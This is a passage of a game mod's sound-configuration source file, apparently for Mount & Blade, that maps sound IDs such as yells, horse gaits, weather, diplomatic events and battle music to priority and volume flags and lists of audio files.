["man_yell_01.wav","man_yell_02.wav","man_yell_03.wav","man_yell_04.wav","man_yell_05.wav","man_yell_06.wav","man_yell_07.wav","man_yell_08.wav","man_yell_09.wav","man_yell_10.wav","man_yell_11.wav","man_yell_12.wav","man_yell_13.wav","man_yell_14.wav","man_yell_15.wav","man_yell_16.wav","man_yell_17.wav","man_yell_18.wav","man_yell_19.wav","man_yell_20.wav","man_yell_21.wav","man_yell_22.wav","man_yell_23.wav","man_yell_24.wav","man_yell_25.wav","man_yell_26.wav","man_yell_27.wav","man_yell_28.wav","man_yell_29.wav","man_yell_30.wav"]), ("man_grunt_long", sf_priority_3|sf_vol_7, ["man_heavy_grunt_01.ogg", "man_heavy_grunt_02.ogg", "man_heavy_grunt_03.ogg", "man_heavy_grunt_04.ogg", "man_heavy_grunt_05.ogg", "man_heavy_grunt_06.ogg", "man_heavy_grunt_07.ogg", "man_heavy_grunt_08.ogg", "man_heavy_grunt_09.ogg", "man_heavy_grunt_10.ogg", "man_heavy_grunt_11.ogg", "man_heavy_grunt_12.ogg", "man_heavy_grunt_13.ogg", "man_heavy_grunt_14.ogg", "man_heavy_grunt_15.ogg"]), ("man_yell",sf_priority_5|sf_vol_5, ["man_yell_01.wav","man_yell_02.wav","man_yell_03.wav","man_yell_04.wav","man_yell_05.wav","man_yell_06.wav","man_yell_07.wav","man_yell_08.wav","man_yell_09.wav","man_yell_10.wav","man_yell_11.wav","man_yell_12.wav","man_yell_13.wav","man_yell_14.wav","man_yell_15.wav","man_yell_16.wav","man_yell_17.wav","man_yell_18.wav","man_yell_19.wav","man_yell_20.wav","man_yell_21.wav","man_yell_22.wav","man_yell_23.wav","man_yell_24.wav","man_yell_25.wav","man_yell_26.wav","man_yell_27.wav","man_yell_28.wav","man_yell_29.wav","man_yell_30.wav"]), ## not adequate, removed: "man_yell_b_21.wav","man_yell_b_22.wav","man_yell_b_23.wav"]), #TODONOW: ("man_warcry", sf_priority_3|sf_vol_6, ["man_insult_2.ogg", "man_insult_3.ogg", "man_insult_7.ogg", "man_insult_9.ogg", "man_insult_13.ogg", "man_insult_15.ogg", "man_insult_16.ogg", "man_yell_4.ogg", "man_yell_7.ogg", "man_yell_9.ogg", "man_yell_11.ogg", "man_yell_13.ogg", "man_yell_15.ogg", "man_yell_16.ogg"]), #OLD ("man_warcry",sf_priority_5, ["man_insult_01.wav","man_insult_02.wav","man_insult_03.wav","man_insult_04.wav","man_insult_05.wav","man_insult_06.wav","man_insult_07.wav","man_insult_08.wav","man_insult_09.wav","man_insult_10.wav","man_insult_11.wav","man_insult_12.wav","man_insult_13.wav","man_insult_14.wav","man_insult_15.wav","man_insult_16.wav","man_insult_17.wav","man_insult_18.wav","man_insult_19.wav","man_insult_20.wav","man_insult_21.wav","man_insult_22.wav","man_insult_23.wav","man_insult_24.wav","man_insult_25.wav","man_insult_26.wav","man_insult_27.wav","man_insult_28.wav"]), ("encounter_looters",sf_2d|sf_vol_8, []), # ("encounter_bandits",sf_2d|sf_vol_8, []), ("encounter_farmers",sf_2d|sf_vol_8, []), ("encounter_sea_raiders",sf_2d|sf_vol_8, []), ("encounter_steppe_bandits",sf_2d|sf_vol_8, []), #("encounter_nobleman",sf_2d|sf_vol_8, ["encounter_nobleman_1.wav"]), #("encounter_vaegirs_ally",sf_2d|sf_vol_8, ["encounter_vaegirs_ally.wav","encounter_vaegirs_ally_2.wav"]), #("encounter_vaegirs_neutral",sf_2d|sf_vol_8, ["encounter_vaegirs_neutral.wav","encounter_vaegirs_neutral_2.wav","encounter_vaegirs_neutral_3.wav","encounter_vaegirs_neutral_4.wav"]), #("encounter_vaegirs_enemy",sf_2d|sf_vol_8, ["encounter_vaegirs_neutral.wav","encounter_vaegirs_neutral_2.wav","encounter_vaegirs_neutral_3.wav","encounter_vaegirs_neutral_4.wav"]), ("sneak_town_halt",sf_2d, ["sneak_halt_1.wav","sneak_halt_2.wav"]), ("horse_walk",sf_priority_3|sf_vol_10, ["horse_walk_01.wav","horse_walk_02.wav","horse_walk_03.wav","horse_walk_04.wav","horse_walk_05.wav","horse_walk_06.wav","horse_walk_07.wav","horse_walk_08.wav"]), ("horse_trot",sf_priority_4|sf_vol_10, ["horse_trot_01.wav","horse_trot_02.wav","horse_trot_03.wav","horse_trot_04.wav","horse_trot_05.wav","horse_trot_06.wav","horse_trot_07.wav","horse_trot_08.wav","horse_trot_09.wav","horse_trot_10.wav"]), ("horse_canter",sf_priority_4|sf_vol_13, ["horse_canter_01.wav","horse_canter_02.wav","horse_canter_03.wav","horse_canter_04.wav","horse_canter_05.wav","horse_canter_06.wav","horse_canter_07.wav","horse_canter_08.wav"]), ("horse_gallop",sf_priority_5|sf_vol_13, ["horse_gallop_01.wav","horse_gallop_02.wav","horse_gallop_03.wav","horse_gallop_04.wav","horse_gallop_05.wav","horse_gallop_06.wav","horse_gallop_07.wav","horse_gallop_08.wav","horse_gallop_09.wav","horse_gallop_10.wav"]), ("horse_breath",sf_priority_1|sf_priority_9|sf_vol_10, ["horse_breath_4.wav","horse_breath_5.wav","horse_breath_6.wav","horse_breath_7.wav"]), ("horse_snort",sf_priority_1|sf_vol_10, ["horse_snort_1.wav","horse_snort_2.wav","horse_snort_3.wav","horse_snort_4.wav","horse_snort_5.wav"]), ("horse_low_whinny",sf_vol_12, ["horse_whinny-1.wav","horse_whinny-2.wav"]), ("block_fist",0, ["block_fist_3.wav","block_fist_4.wav"]), ("man_hit_blunt_weak",sf_priority_5|sf_vol_10, ["man_grunt_10.wav","man_grunt_11.wav","man_grunt_12.wav","man_grunt_13.wav","man_grunt_14.wav","man_grunt_15.wav","man_grunt_16.wav","man_grunt_17.wav","man_grunt_18.wav","man_grunt_19.wav","man_grunt_20.wav","man_grunt_21.wav","man_grunt_22.wav","man_grunt_23.wav","man_grunt_24.wav","man_grunt_25.wav","man_grunt_26.wav","man_grunt_27.wav","man_grunt_28.wav","man_grunt_29.wav","man_grunt_30.wav","man_grunt_31.wav","man_grunt_32.wav","man_grunt_33.wav","man_grunt_34.wav","man_grunt_35.wav","man_grunt_36.wav","man_grunt_37.wav","man_grunt_38.wav","man_grunt_39.wav","man_grunt_40.wav","man_grunt_41.wav"]), ("man_hit_blunt_strong",sf_priority_5|sf_vol_10, ["man_grunt_01.wav","man_grunt_02.wav","man_grunt_03.wav","man_grunt_04.wav","man_grunt_05.wav","man_grunt_17.wav","man_grunt_18.wav","man_grunt_19.wav","man_grunt_20.wav","man_grunt_21.wav","man_grunt_22.wav","man_grunt_23.wav","man_grunt_24.wav","man_grunt_25.wav","man_grunt_26.wav","man_grunt_27.wav","man_grunt_28.wav","man_grunt_29.wav","man_grunt_30.wav","man_grunt_31.wav","man_grunt_32.wav","man_grunt_33.wav","man_grunt_34.wav","man_grunt_35.wav","man_grunt_36.wav","man_grunt_37.wav","man_grunt_38.wav","man_grunt_39.wav","man_grunt_40.wav","man_grunt_41.wav"]), ("man_hit_pierce_weak",sf_priority_5|sf_vol_10, ["man_grunt_01.wav","man_grunt_02.wav","man_grunt_03.wav","man_grunt_04.wav","man_grunt_05.wav","man_grunt_06.wav","man_grunt_07.wav","man_grunt_08.wav","man_grunt_09.wav","man_grunt_10.wav","man_grunt_11.wav","man_grunt_12.wav","man_grunt_22.wav","man_grunt_23.wav","man_grunt_24.wav","man_grunt_25.wav","man_grunt_26.wav","man_grunt_27.wav","man_grunt_28.wav","man_grunt_29.wav","man_grunt_30.wav","man_grunt_31.wav","man_grunt_32.wav","man_grunt_33.wav","man_grunt_34.wav","man_grunt_35.wav","man_grunt_36.wav","man_grunt_37.wav","man_grunt_38.wav","man_grunt_39.wav","man_grunt_40.wav","man_grunt_41.wav"]), ("man_hit_pierce_strong",sf_priority_5|sf_vol_10, ["man_grunt_01.wav","man_grunt_02.wav","man_grunt_03.wav","man_grunt_04.wav","man_grunt_05.wav","man_grunt_06.wav","man_grunt_07.wav","man_grunt_08.wav","man_grunt_09.wav","man_grunt_10.wav","man_grunt_11.wav","man_grunt_12.wav","man_grunt_13.wav","man_grunt_14.wav","man_grunt_15.wav","man_grunt_16.wav","man_grunt_17.wav","man_grunt_18.wav","man_grunt_19.wav","man_grunt_20.wav","man_grunt_21.wav","man_grunt_22.wav","man_grunt_32.wav","man_grunt_33.wav","man_grunt_34.wav","man_grunt_35.wav","man_grunt_36.wav","man_grunt_37.wav","man_grunt_38.wav","man_grunt_39.wav","man_grunt_40.wav","man_grunt_41.wav"]), ("man_hit_cut_weak",sf_priority_5|sf_vol_10, ["man_grunt_01.wav","man_grunt_02.wav","man_grunt_03.wav","man_grunt_04.wav","man_grunt_05.wav","man_grunt_06.wav","man_grunt_07.wav","man_grunt_08.wav","man_grunt_09.wav","man_grunt_10.wav","man_grunt_11.wav","man_grunt_12.wav","man_grunt_13.wav","man_grunt_14.wav","man_grunt_15.wav","man_grunt_16.wav","man_grunt_17.wav","man_grunt_18.wav","man_grunt_19.wav","man_grunt_20.wav","man_grunt_21.wav","man_grunt_22.wav","man_grunt_23.wav","man_grunt_24.wav","man_grunt_25.wav","man_grunt_26.wav","man_grunt_27.wav","man_grunt_28.wav","man_grunt_29.wav","man_grunt_30.wav","man_grunt_31.wav","man_grunt_32.wav"]), ("man_hit_cut_strong",sf_priority_5|sf_vol_10, ["man_grunt_01.wav","man_grunt_02.wav","man_grunt_03.wav","man_grunt_04.wav","man_grunt_05.wav","man_grunt_06.wav","man_grunt_07.wav","man_grunt_08.wav","man_grunt_09.wav","man_grunt_10.wav","man_grunt_11.wav","man_grunt_12.wav","man_grunt_13.wav","man_grunt_14.wav","man_grunt_15.wav","man_grunt_16.wav","man_grunt_17.wav","man_grunt_18.wav","man_grunt_19.wav","man_grunt_20.wav","man_grunt_21.wav","man_grunt_22.wav","man_grunt_23.wav","man_grunt_24.wav","man_grunt_25.wav","man_grunt_35.wav","man_grunt_36.wav","man_grunt_37.wav","man_grunt_38.wav","man_grunt_39.wav","man_grunt_40.wav","man_grunt_41.wav"]), ("man_victory",sf_priority_5|sf_vol_9, ["man_victory_3.wav","man_victory_4.wav","man_victory_5.wav","man_victory_8.wav","man_victory_15.wav","man_victory_49.wav","man_victory_52.wav","man_victory_54.wav","man_victory_57.wav","man_victory_71.wav","man_victory_01.wav","man_victory_02.wav","man_victory_03.wav"]), ("fire_loop",sf_priority_9|sf_vol_4|sf_looping|sf_start_at_random_pos, ["fx_fire_medium_01_lp.ogg", "fx_fire_campfire_lp.ogg", "fx_fire_campfire_lp.ogg", "fx_fire_embers_02_lp.ogg", "fx_fire_embers_02a_lp.ogg", "fx_fire_embers_02b_lp.ogg", "fx_fire_embers_02c_lp.ogg", "fx_fire_large_01_lp.ogg", "fx_fire_large_02_lp.ogg", "fx_fire_large_03_lp.ogg","Fire_Torch_Loop3.wav"]), ("torch_loop",sf_priority_9|sf_vol_4|sf_looping|sf_start_at_random_pos, ["Fire_Torch_Loop3.wav"]), ("dummy_hit",sf_priority_9, ["dummy_hit_01.wav","dummy_hit_02.wav","dummy_hit_03.wav"]), ("dummy_destroyed",sf_priority_9, ["dummy_break_01.wav","dummy_break_02.wav","dummy_break_03.wav","dummy_break_04.wav","dummy_break_05.wav"]), ("gourd_destroyed",sf_priority_9, ["dummy_break_01.wav","dummy_break_02.wav","dummy_break_03.wav","dummy_break_04.wav","dummy_break_05.wav"]),#TODO ("cow_moo", sf_2d|sf_priority_9|sf_vol_8, ["cow_moo_1.wav"]), ("cow_slaughter", sf_2d|sf_priority_9|sf_vol_8, ["cow_slaughter_01.wav","cow_slaughter_02.wav"]), ("distant_dog_bark", sf_2d|sf_priority_3|sf_vol_8, ["d_dog1.wav","d_dog2.wav","d_dog3.wav","d_dog7.wav"]), ("distant_owl", sf_2d|sf_priority_3|sf_vol_9, ["d_owl2.wav","d_owl3.wav","d_owl4.wav"]), ("distant_chicken", sf_2d|sf_priority_3|sf_vol_8, ["d_chicken1.wav","d_chicken2.wav"]), ("distant_carpenter", sf_2d|sf_priority_3|sf_vol_3, ["d_carpenter1.wav","d_saw_short3.wav"]), ("distant_blacksmith", sf_2d|sf_priority_3|sf_vol_4, ["d_blacksmith2.wav"]), ("arena_ambiance", sf_2d|sf_priority_8|sf_vol_3|sf_looping, ["arena_loop11.wav"]), ("town_ambiance", sf_2d|sf_priority_8|sf_vol_3|sf_looping, ["town_loop_3.wav"]), ("tutorial_fail", sf_2d|sf_vol_7,["cue_failure.wav"]), ("your_flag_taken", sf_2d|sf_priority_10|sf_vol_10, []), ("enemy_flag_taken", sf_2d|sf_priority_10|sf_vol_10, []), ("flag_returned", sf_2d|sf_priority_10|sf_vol_10, []), ("team_scored_a_point", sf_2d|sf_priority_10|sf_vol_10, []), ("enemy_scored_a_point", sf_2d|sf_priority_10|sf_vol_10, []), ("sea_travel", sf_looping|sf_priority_1|sf_vol_4, ["sea_travel.ogg"]), ("horn", sf_priority_1|sf_vol_15, ["horn1.wav", "horn2.wav", "horn3.wav", "horn4.wav", "horn5.wav", "horn6.wav", "c1.wav", "c2.wav", "ee1.wav", "ee2.wav", "ee3.wav", "ee4.wav", "greek2.wav", "ne1.wav", "ne2.wav", "ne4.wav", "vhorn.wav", "vhorn1.wav", "vhorn2.wav", "vhorn3.wav", "vhorn4.wav", "vhorn5.wav", "ME_warhorn_charge_01.wav","ME_warhorn_charge_02.wav","NE_warhorn_charge.wav","SE_warhorn_charge.wav",]), ("horn_priority", sf_priority_14|sf_vol_15, ["horn1.wav", "horn2.wav", "horn3.wav", "horn4.wav", "horn5.wav", "horn6.wav", "c1.wav", "c2.wav", "ee1.wav", "ee2.wav", "ee3.wav", "ee4.wav", "greek2.wav", "ne1.wav", "ne2.wav", "ne4.wav", "vhorn.wav", "vhorn1.wav", "vhorn2.wav", "vhorn3.wav", "vhorn4.wav", "vhorn5.wav", "ME_warhorn_charge_01.wav","ME_warhorn_charge_02.wav","NE_warhorn_charge.wav","SE_warhorn_charge.wav",]), #("wind", sf_looping|sf_priority_10|sf_vol_5, ["wind.wav"]), ("wind", sf_looping|sf_priority_10|sf_vol_5, ["wind.wav", "Wind_WinterStorm1.wav", "Wind_WinterHills.wav", "Wind_Winter_Medium.wav", "Wind_Winter_Light_02.wav", "Wind_Winter_Light_01.wav", "Wind_Winter_Icy.wav", "Wind_Winter_Howl.wav", "Wind_Winter_Gales_01.wav", "Wind_winter.wav", "Wind_Whistling.wav", "Wind_Sand_03.wav", "Wind_Sand_02.wav", "Wind_Mountain.wav", "Wind_Lush.wav", "Wind_HowlGusty_02.wav", "Wind_Breezes_02.wav", ]), #("thunder", sf_priority_1|sf_vol_15, ["thunder01.wav", "thunder02.wav", "thunder03.wav", "thunder04.wav"]), ("thunder", sf_priority_2|sf_vol_15, ["thunder01.wav", "thunder02.wav", "thunder03.wav", "thunder04.wav", "thunder_medium_03.wav", "thunder_medium_02.wav", "thunder_medium_01.wav", "thunder_far_05.wav", "thunder_far_04.wav", "thunder_far_03.wav", "thunder_far_02.wav", "thunder_far_01.wav", "thunder_close_06.wav", "thunder_close_05.wav", "thunder_close_04.wav", "thunder_close_03.wav", "thunder_close_02.wav", "thunder_close_01.wav"]), ("cough", sf_priority_5|sf_vol_5, ["man_cough_1.wav", "man_cough_2.wav", "man_cough_3.wav", "cough_01.wav", "cough_02.wav", "cough_03.wav", "cough_04.wav", "cough_05.wav", "cough_06.wav", "cough_07.wav", "cough_08.wav", "cough_09.wav", "cough_10.wav", "belch_01.wav", "belch_02.wav", "belch_03.wav", "belch_04.wav", "belch_05.wav", "belch_06.wav", "sneeze_01.wav", "sneeze_02.wav", "sneeze_03.wav", "sneeze_04.wav", "sneeze_05.wav" "sniff_04.wav", "spit_01.wav", "spit_02.wav", "throat_04.wav", "throat_03.wav", "throat_10.wav"]), ("sea_ambiance", sf_2d|sf_looping|sf_priority_8|sf_vol_9, ["sea_loop.wav"]), ### Dice game ### Dice game ### ("dice_roll",sf_priority_10|sf_vol_10, ["dice_roll.wav"]), ### Dice game ### Dice game ### END ### #####Drinking game OSP Begin #("drunk_concourt",sf_priority_10|sf_vol_10, ["drunk_fight.wav"]), #("drunk_ko",sf_priority_10|sf_vol_10, ["vomi.wav"]), #####Drinking game OSP End #Summaries begin #("summary_generic", sf_2d|sf_priority_1|sf_vol_2, ["summary_generic_01.mp3", "summary_generic_02.mp3", "summary_generic_03.mp3", "summary_generic_04.mp3", "report.mp3", "diplomacy_report.mp3", "mission_issued.mp3"]), ("summary_finance", sf_2d|sf_priority_1|sf_vol_5, ["summary_finance_01.mp3", "summary_finance_02.mp3"]), #### #AI Death Sounds Begin ("decapitation_battle", sf_priority_9|sf_vol_11, ["decap1.ogg", "decap2.ogg", "decap3.ogg", "decap4.ogg"]), #here ("decapitation", sf_2d|sf_priority_3|sf_vol_5, ["decap1.ogg", "decap2.ogg", "decap3.ogg", "decap4.ogg", "character_dies_disaster.mp3", "character_dies_natural.mp3", "character_dies_heroic.mp3", "general_dies.mp3", "general_killed_ally.mp3", "general_killed_enemy.mp3"]), ("decapitation_leader", sf_2d|sf_priority_4|sf_vol_7, ["faction_leader_dies.mp3", "faction_leader_killed.mp3"]), ("new_faction_leader", sf_2d|sf_priority_5|sf_vol_9, ["new_faction_leader.mp3", "new_faction_heir.mp3", "general_promoted.mp3"]), #### #Battle-related sounds begin #("battle_sounds", sf_2d|sf_priority_6|sf_vol_6, ["players_army_destroyed.mp3"]), #("won_battle", sf_2d|sf_priority_7|sf_vol_6, ["rebels_victorious.mp3", "infantry_group_celebrate_small_01.wav", "infantry_group_celebrate_large_01.wav"]), #### #Rebel-independece-related sounds begin ("rebel_sounds", sf_2d|sf_priority_8|sf_vol_7, ["settlement_unrest.mp3", "settlement_taken.mp3", "settlement_surrenders.mp3", "settlement_revolts.mp3", "settlement_razed.mp3", "settlement_exterminated.mp3", "settlement_destroyed.mp3", "disaster_riot.mp3", "city_gained_through_revolt.mp3", "end_turn_brittania_03.mp3", "end_turn_brittania_04.mp3"]), ("new_factions", sf_2d|sf_priority_9|sf_vol_7, ["historic_event.mp3", "mission_denounce.mp3", "mission_denounce_arrived.mp3", "mission_denounce_fail.mp3", "emergent_faction_appears.mp3", "end_turn_brittania_01.mp3", "end_turn_brittania_02.mp3"]), ("historical_event", sf_2d|sf_priority_9|sf_vol_7, ["historic_event.mp3"]), #### #Recruitment-related sounds begin ("bribe_hire", sf_2d|sf_priority_10|sf_vol_5, ["army_bribed.mp3", "character_bribed.mp3"]), ("hire_units", sf_2d|sf_priority_11|sf_vol_5, ["unit_completed.mp3", "recruitment_complete_03.mp3", "recruitment_complete_02.mp3", "recruitment_complete_01.mp3", "merge_armies_02.wav"]), #### ####Diplomatic sounds begin ("ceasefire", sf_2d|sf_priority_12|sf_vol_5, ["ceasefire_declared.mp3", "relations_improved.mp3"]), ("truce_declare", sf_2d|sf_priority_12|sf_vol_5, ["alliance_declared.mp3", "ally_declared_alliance_with_enemy.mp3", "peace_treaty_signed.mp3", "mission_success.mp3"]), ("war_declared", sf_2d|sf_priority_12|sf_vol_5, ["war_declared.mp3", "war_declared_arrived.mp3", "transgression.mp3", "mission_expired.mp3", "relations_worsened.mp3"]), ("decline_prisoner", sf_2d|sf_priority_12|sf_vol_5, ["decline_release.mp3"]), ("accept_prisoner", sf_2d|sf_priority_12|sf_vol_5, ["event_prisoner_release.mp3", "prisoner_ransom_01.mp3", "prisoner_ransom_02.mp3","prisoner_ransom_03.mp3","prisoner_ransom_04.mp3","prisoner_ransom_05.mp3","prisoner_ransom_06.mp3","prisoner_ransom_07.mp3","prisoner_ransom_08.mp3","prisoner_ransom_10.mp3","prisoner_ransom_11.mp3","prisoner_ransom_12.mp3"]), #### ####Events Begin ("crusade_called", sf_2d|sf_priority_13|sf_vol_7, ["crusade_called.mp3", "crusade_called_arrived.mp3"]), ("crusade_reached", sf_2d|sf_priority_13|sf_vol_5, ["crusade_factions_joined.mp3"]), ("crusade_fail", sf_2d|sf_priority_13|sf_vol_8, ["crusade_cancelled.mp3", "crusade_failed.mp3", "crusade_unit_deserted_no_progress.mp3", "pope_dies.mp3"]), ("crusade_success", sf_2d|sf_priority_13|sf_vol_8, ["crusade_succeed.mp3"]), ("recruits_left", sf_2d|sf_priority_14|sf_vol_5, ["crusade_units_desert_warning.mp3", "crusade_units_deserted_removed.mp3", "small_army_disbands.mp3"]), ("faction_defeated", sf_2d|sf_priority_13|sf_vol_8, ["faction_defeated.mp3", "faction_defeated_by_player.mp3", "rebel_revolt_suppressed.mp3"]), ("occupy_center", sf_2d|sf_priority_15|sf_vol_5, ["settlement_occupied.mp3", "building_captured_battle.mp3", "building_captured_by_allies.mp3"]), #Occupied center ("players_settlement_besieged", sf_2d|sf_priority_14|sf_vol_5, ["settlement_besieged_arrived.mp3"]), ("prepare_equipment_for_siege", sf_2d|sf_priority_14|sf_vol_6, ["protectorate_established.mp3", "upgrade_settlement_01.mp3"]), #New ("treaty_degraded", sf_2d|sf_priority_14|sf_vol_6, ["alliance_broken.mp3"]), ("construction_approved", sf_2d|sf_priority_14|sf_vol_6, ["construction_approval.mp3", "construction_complete_many.mp3", "upgrade_settlement_01.mp3", "upgrade_guild.mp3"]), #For towns and villages only ##("construction_approved", sf_2d|sf_priority_14|sf_vol_6, ["construction_approval.mp3", "construction_complete_many.mp3", "upgrade_settlement_02.mp3", "upgrade_settlement_01.mp3", "upgrade_guild.mp3", "upgrade_settlement_03.mp3", "upgrade_settlement_04.mp3"]), #For towns and villages only ("purchase_manor", sf_2d|sf_priority_14|sf_vol_6, ["create_guild.mp3"]), ("engage_enemy_field", sf_2d|sf_priority_14|sf_vol_6, ["engage_enemy.mp3", "CMA_defend.mp3", "CMA_attack.mp3", "sbattle.mp3", "start_battle_teutonic.mp3", "engage_enemy_02.mp3", "attack.mp3", "attack_out_of_range_01.mp3", "siege_attack.mp3"]), ("manor_upgrade_complete", sf_2d|sf_priority_14|sf_vol_6, ["mission_issued_arrived.mp3"]), #("enter_arena", sf_2d|sf_priority_14|sf_vol_6, ["summary_training_01.mp3", "summary_training_02.mp3", "summary_training_03.mp3", "summary_training_04.mp3", "summary_training_05.mp3"]), ("ambient_menus", sf_2d|sf_priority_14|sf_vol_6, ["ambient_town_euro_01.wav", "ambient_town_euro_02.wav", "ambient_town_euro_03.wav", "ambient_town_euro_04.wav", "ambient_town_euro_05.wav" "ambient_town_euro_bell_02.wav", "ambient_town_euro_bell_03.wav", "ambient_town_euro_bell_04.wav", "ambient_town_euro_birds_01a.wav", "ambient_town_euro_birds_01b.wav", "ambient_town_euro_birds_01c.wav", "ambient_town_euro_birds_02a.wav", "ambient_town_euro_birds_02b.wav", "ambient_town_euro_birds_02c.wav", "ambient_town_euro_birds_03a.wav", "ambient_town_euro_birds_03b.wav", "ambient_town_euro_birds_03c.wav", "ambient_town_euro_birds_04a.wav", "ambient_town_euro_birds_04b.wav", "ambient_town_euro_birds_04c.wav", "ambient_town_euro_birds_05a.wav", "ambient_town_euro_birds_05b.wav"]), ("belfry_sound", sf_looping|sf_priority_10|sf_vol_15, ["Siege_Tower_Move_Grass.wav", "Siege_Tower_Move_Snow.wav", "Siege_Tower_Move_Stone.wav", "Siege_Tower_Move_Wood.wav"]), ("belfry_sound_end", sf_priority_10|sf_vol_15, ["siege_t1.mp3", "siege_t2.mp3"]), #Co-Op Only ("belfry_sound_end_sp", sf_priority_10|sf_vol_15, ["siege_t1_sp.mp3", "siege_t2_sp.mp3"]), #SP Only #####Wounded OSP Begin ("death",sf_priority_10|sf_vol_10, ["death_end.ogg"]), #####Wounded OSP End #####Extra sounds Begin ("oil_noise",sf_priority_1|sf_vol_1, ["boiling_oil.wav"]), #####Extra Sounds End #Warwolf begin additional sounds for disasters # ("Typhoon", sf_2d|sf_priority_9|sf_vol_10, ["Typhoon.ogg"]), # ("Forest_fires", sf_2d|sf_priority_9|sf_vol_10, ["Forest_fires.ogg"]), # ("Tsunami", sf_2d|sf_priority_9|sf_vol_10, ["Tsunami.ogg"]), # ("Drought", sf_2d|sf_priority_9|sf_vol_10, ["Drought.ogg"]), # ("The_Black_Death", sf_2d|sf_priority_9|sf_vol_10, ["The_Black_Death.ogg"]), # ("Earthquake", sf_2d|sf_priority_9|sf_vol_10, ["Earthquake.ogg"]), # ("Flood", sf_2d|sf_priority_9|sf_vol_10, ["Flood.ogg"]), # ("eruptions", sf_2d|sf_priority_9|sf_vol_10, ["eruptions.ogg"]), # ("bad_drum", sf_2d|sf_priority_10|sf_vol_9, ["quest_cancelled2.ogg"]), # #("rats_squeak", sf_2d|sf_priority_9|sf_vol_8, ["rats_squeak.ogg"]), # # ("cat_meow", sf_2d|sf_vol_15, ["cat_meow.ogg"]), ("Typhoon", sf_2d|sf_priority_9|sf_vol_10, ["Typhoon.ogg"]), ("Forest_fires", sf_2d|sf_priority_9|sf_vol_10, ["Forest_fires.ogg"]), ("Tsunami", sf_2d|sf_priority_9|sf_vol_10, ["Tsunami.ogg"]), ("Drought", sf_2d|sf_priority_9|sf_vol_10, ["Drought.ogg"]), ("The_Black_Death", sf_2d|sf_priority_9|sf_vol_10, ["The_Black_Death.ogg"]), ("Earthquake", sf_2d|sf_priority_9|sf_vol_10, ["Earthquake.ogg"]), ("Flood", sf_2d|sf_priority_9|sf_vol_10, ["Flood.ogg"]), ("eruptions", sf_2d|sf_priority_9|sf_vol_10, ["eruptions.ogg"]), ("bad_drum", sf_2d|sf_priority_10|sf_vol_9, ["quest_cancelled2.ogg"]), #("rats_squeak", sf_2d|sf_priority_9|sf_vol_8, ["rats_squeak.ogg"]), # ("cat_meow", sf_2d|sf_vol_15, ["cat_meow.ogg"]), #Warwolf end #####MUSICBOX BEGIN #Battle Music Begin # ##Tensions ## ("arab_tension1", sf_2d|sf_priority_15|sf_vol_10, ["(Arabic_Tension_4).mp3","(Arabic_Tension_3).mp3", "(Crusades_Tension)_Parched.mp3", "(Crusades_Loading)_Against_The_Rock.mp3", "(Arabic_Camp_Battle_1)_Honour_Of_Sultan.mp3", "(Crusades_Campaign_Battle)_Sun_Eyes.mp3"]), ## ("steppe_tension", sf_2d|sf_priority_15|sf_vol_10, ["(Brittania_Tension)_Ghosts_Of_Loch.mp3", "(Britannia_Camp_Battle)_Tally-ho.mp3", "(Euro_Tension_2)_Call_Of_The_Sheep.mp3", "(Euro_Tension_9)_Grave_Blow.mp3", "(Euro_Tension_6)_Chase.mp3"]), ## ("euro_tension", sf_2d|sf_priority_15|sf_vol_10, ["(Euro_Tension_1)_BladeGrass.mp3","(Euro_Tension_3)_Fear_Frozen.mp3","(Euro_Tension_4).mp3","(Euro_Tension_5).mp3","(Euro_Tension_7)_The_Reveal.mp3","(Euro_Tension_8)_Ignosi.mp3","(Teutonic_Tension)_Forest_Haze.mp3", "(Teutonic_Campaign_Loading)_Brothers_Together", "(Euro_Loading_3)_Epic_Unease.mp3", "(Teutonic_Campaign_Battle)_Hungry_Sword.mp3", "(Euro_Camp_Battle_1)_Destiny.mp3" ]), # ##Field Battles ## ("arabb1", sf_2d|sf_priority_15|sf_vol_10, ["(Arabic_Battle_1)_Crack_your_head_with_a_Tabla.mp3"]), ## ("arabb2", sf_2d|sf_priority_15|sf_vol_10, ["(Arabic_Battle_2)_Wind_Cuts.mp3"]), ## #("arabb3", sf_2d|sf_priority_15|sf_vol_10, ["(Arabic_Camp_Battle_1)_Honour_Of_Sultan.mp3"]), ## ("arabb4", sf_2d|sf_priority_15|sf_vol_10, ["(Arabic_Battle_3).mp3"]), ## ("arabb5", sf_2d|sf_priority_15|sf_vol_10, ["(Arabic_Battle_4).mp3"]), ## ("arabb6", sf_2d|sf_priority_15|sf_vol_10, ["(Crusades_Battle)_Valley_Of_Death.mp3"]), ## ("arabb8", sf_2d|sf_priority_15|sf_vol_10, ["(Arabic_Tension_1)_Kebabka.mp3"]), ## ("arabb9", sf_2d|sf_priority_15|sf_vol_10, ["(Arabic_Tension_5).mp3"]), ## #("arabb7", sf_2d|sf_priority_15|sf_vol_10, ["(Crusades_Campaign_Battle)_Sun_Eyes.mp3"]), ## #NOTE Mediterrain battle and mobilize (sieges) are shared songs. ## ("medib1", sf_2d|sf_priority_15|sf_vol_10, ["(Mediterranean_Battle_1)_Lifted_To_The_Hotplate.mp3"]), ## #("medib2", sf_2d|sf_priority_15|sf_vol_10, ["(Britannia_Camp_Battle)_Tally-ho.mp3"]), ## #Mobilize ## ("medib3", sf_2d|sf_priority_15|sf_vol_10, ["(Mediterranean_Mobilize_1)_Mare_Nostrum.mp3"]), #Sieges too ## ("medib4", sf_2d|sf_priority_15|sf_vol_10, ["(Mediterranean_Mobilize_2)_Death_Lullaby.mp3"]), #Sieges too ## ("medib5", sf_2d|sf_priority_15|sf_vol_10, ["(Mediterranean_Mobilize_2)_Song_For_Toomba.mp3"]), #Sieges too ## ("medib6", sf_2d|sf_priority_15|sf_vol_10, ["(Mediterranean_Tension_1)_By_The_Marmara.mp3"]), ## ("medib7", sf_2d|sf_priority_15|sf_vol_10, ["(Mediterranean_Tension_2)_Secret_Sandals.mp3"]), ## ("medib8", sf_2d|sf_priority_15|sf_vol_10, ["(Arabic_Tension_2)_Starsand.mp3"]), #Starsand ## #Field Continuation ## ## ## ("eurob1", sf_2d|sf_priority_15|sf_vol_10, ["(Euro_Battle_1)_Duke_of_Death.mp3"]), ## ("eurob2", sf_2d|sf_priority_15|sf_vol_10, ["(Euro_Battle_2)_Nothing_Left.mp3"]), ## ("eurob3", sf_2d|sf_priority_15|sf_vol_10, ["(Euro_Battle_3)_Crusaders.mp3"]), ## ("eurob4", sf_2d|sf_priority_15|sf_vol_10, ["(Euro_Battle_4)_War_of_Kings.mp3"]), ## ("eurob5", sf_2d|sf_priority_15|sf_vol_10, ["(Euro_Battle_5).mp3"]), ## ("eurob6", 